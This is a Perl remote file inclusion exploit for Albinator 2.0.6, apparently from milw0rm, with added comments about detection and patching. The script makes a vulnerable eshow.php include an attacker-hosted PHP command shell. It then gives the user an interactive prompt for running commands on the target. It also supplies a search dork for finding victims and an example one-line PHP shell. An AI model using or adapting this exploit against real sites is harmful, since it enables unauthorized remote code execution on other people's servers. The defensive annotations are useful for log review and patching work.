
Albinator 2.0.6 Config_rootdir Remote File Inclusion Exploit

  1    #!/usr/bin/perl
  2    ##
  3    #Albinator Multiple Parameter File Inclusion
  4    # Bug discovered by VietMafia and r0t
  5    # code copier: webDEViL w3bd3vil[at]gmail.com
  6    #code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
  7    #Dork:"powered by Albinator "
  8    # usage:
  9    # perl wb.pl <target> <cmd shell location> <cmd shell variable>
  10   # perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
  11   # cmd shell example: <?system($cmd);?>
  12   # cmd shell variable: ($_GET[cmd]);
  13
  14   use LWP::UserAgent;
  15
  # Argument handling and the interactive loop. Each line read from STDIN is sent as
  # one HTTP GET to <target>eshow.php with a Config_rootdir query parameter that
  # points at a remote URL, and the response body is printed back.
  16   $Path = $ARGV[0];
  17   $Pathtocmd = $ARGV[1];
  18   $cmdv = $ARGV[2];
  19
  # Both URL arguments only have to contain "http://" somewhere (the match is not
  # anchored) and the third argument must be non-empty; otherwise usage() prints
  # the help text and exits.
  20   if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
  21
  22   head();
  23
  # Outer loop prints the prompt; inner loop reads one line at a time from STDIN.
  24   while()
  25   {
  26         print "[shell] \$";
  27   while(<STDIN>)
  28         {
  29                  $cmd=$_;
  30                  chomp($cmd);
  31
  # Request shape as the target's web server sees it (the part to key log review
  # and WAF rules on):
  #   GET <target>eshow.php?Config_rootdir=http://<remote host>/<file>?&<var>=<text>
  # The typed text is appended without URL-encoding. LWP::UserAgent->new() is called
  # with no options, so the User-Agent header is the library default
  # (libwww-perl/<version>).
  # NOTE(review): the application code is not on this page; presumably eshow.php
  # uses Config_rootdir in an include/require path, which is what the PHP warning
  # matched further down suggests. Server-side, the PHP settings allow_url_include,
  # allow_url_fopen and register_globals are the ones to check; confirm against the
  # deployed PHP version.
  32   $xpl = LWP::UserAgent−>new() or die;
  33   $req = HTTP::Request−>new(GET =>$Path.’eshow.php?Config_rootdir=’.$Pathtocmd.’?&’.$cmdv.’=’.$cmd)or die "\nCould Not connect\n";

  # According to the author's note below, eday.php and forgot.php accept the same
  # parameter, so detection and patching should cover all three script names.
  34   ## can change eshow.php to eday.php or forgot.php
  35
  36   $res = $xpl−>request($req);
  37   $return = $res−>content;
  # Newlines are mapped to a placeholder character so that the (.*) match further
  # down, which does not cross newlines, captures the whole body; the mapping is
  # reversed before printing. The brackets inside tr/// are literal characters that
  # map to themselves.
  38   $return =~ tr/[\n]/[ê]/;
  39
  # Empty input line: print a hint and discard the response.
  40   if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
  41
  # The strings tested here are PHP warning/error text returned in the page body
  # (remote fetch failed, blank command, fatal error). The same text appearing in a
  # site's responses or PHP error log alongside Config_rootdir requests indicates an
  # inclusion attempt against it.
  42   elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/
       )
  43         {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
  44   elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
  45
  # (.*) also matches the empty string, so this condition holds for any response.
  46   if($return =~ /(.*)/)
  47
  48   {
  49         $finreturn = $1;
  # Restore the newlines that were replaced by the placeholder above.
  50         $finreturn=~ tr/[ê]/[\n]/;
  # Print the response body, then leave the inner STDIN loop; the outer loop prints
  # the prompt again and waits for the next line.
  51         print "\r\n$finreturn\n\r";
  52         last;
  53   }
  54
  # This else belongs to the (.*) test, which matches any string, so the branch is
  # not reached. The closing braces end the else block, the inner loop and the outer
  # loop; the trailing `last` then sits outside any loop.
  55   else {print "[shell] \$";}}}last;
  56
  # head: prints the three-line banner (rule, title, rule) to STDOUT.
  # Takes no arguments; no explicit return value.
  57   sub head()
  58    {
  59    print "\n============================================================================\r\n";
  60    print " Albinator Multiple Parameter File Inclusion\r\n";
  61    print "============================================================================\r\n";
  62    }
  # usage: prints the banner, the expected command-line arguments and the author
  # credit, then terminates the script via exit(). Called when the argument check at
  # the top of the script fails.
  63   sub usage()
  64    {
  65    head();
  # The three arguments: base URL of the Albinator install, URL of the remotely
  # hosted file, and the name of the request variable that file reads.
  66    print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
  67    print " <Site> − Full path to Albinator ex: http://www.site.com/ \r\n";
  68    print " <cmd shell> − Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
  69    print " <cmd variable> − Command variable used in php shell \r\n";
  70    print "============================================================================\r\n";
  71    print "                webDEViL w3bd3vil[at]gmail.com \r\n";
  72    print "============================================================================\r\n";
  # exit() is called with no argument; the script does not return to the caller.
  73    exit();
  74    }
  75
  76   # milw0rm.com [2006−05−03]



